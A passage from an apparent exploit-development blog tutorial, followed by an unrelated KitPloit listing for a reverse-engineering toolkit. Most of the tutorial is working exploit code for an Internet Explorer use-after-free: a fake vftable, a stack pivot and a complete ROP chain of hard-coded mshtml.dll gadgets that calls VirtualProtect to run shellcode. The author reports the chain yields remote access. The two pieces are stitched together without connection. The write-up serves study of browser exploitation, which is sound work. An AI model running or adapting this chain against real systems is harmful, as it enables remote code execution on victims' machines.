We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable of 70 DWORDS (70 "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090";             // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll we can see there is are two great candidates to get a stack address into EAX and ECX.

pop esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, our stack will get a return address pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially “jump over” the return address. Here is what this block of ROP chains look like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our call to eventually VirtualProtect, which will mark the stack as RWX, and we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We have the function call on the stack, because we are performing this exploit on a 32-bit system. 32-bit systems, as you can recall, leverage the __stdcall calling convention on Windows, by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by debugging just simply waiting until the third process is created! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, and will be the last process listed in WinDbg under “System order”

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on “jump” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The distance between the first parameter placeholder, which is an IAT entry which points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack value that points to the VirtualProtect parameter placeholder. This value is also copied into ECX, and our previously used COP gadget is leveraged. Then, the value in EAX is dereferenced to get the pointer the stack address points to in EAX (which is the VirtualProtect IAT entry). Then, the IAT entry is dereferenced to get the actual value of VirtualProtect into EAX. ECX, which has the value from EAX inside of it, which is the pointer on the stack to the parameter placeholder for VirtualProtect is overwritten with an arbitrary write gadget to overwrite the stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address which used to point to the parameter placeholder now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 100 DWORDS, or a total length of 100 ROP gadgets.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191"
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The ROP variable is prototyped for 0x500 total bytes worth of gadgets, and keeps track of each DWORD that has already been put on the stack, meaning it will shrink in size dynamically as more gadgets are used up, meaning we can reliably calculate where our shellcode is on the stack without more gadgets pushing the shellcode further and further down. 0x16 in the for loop keeps track of how many gadgets have been used so far, in hexadecimal, and every time we add a gadget we need to increase this number by how many gadgets are added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously with 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increase and compensates for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break out exploit. This way, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.

So to start, let’s place this negative representation between the current value in ECX, which is the stack address that points to 11111111, or our parameter placeholder for the return address, and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX current holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX to it, which is the distance from the return address placeholder, to EAX, which will result in the stack address that points to the beginning of our shellcode into EAX. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address pointing to the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location 4 bytes, so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProcect parameter. Instead of the negative value of 0x401 this time, we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";             // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to to just overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contain NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";             // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECDX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\uCCCC\uCCCC";
}

After ECX is incremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which then is exchanged with ESP to load the function call into ESP! The, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long winded blog post. It has been a bit disheartening to see a lack of beginning to end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping those out who want to get into it, but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

☑ ★ ✇ KitPloit - PenTest & Hacking Tools

Retoolkit - Reverse Engineer's Toolkit

By: Zion3R


This is a collection of tools you may like if you are interested on reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder in your desktop with shortcuts to RE tools like these:


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribuite the software, please file a request here.



❌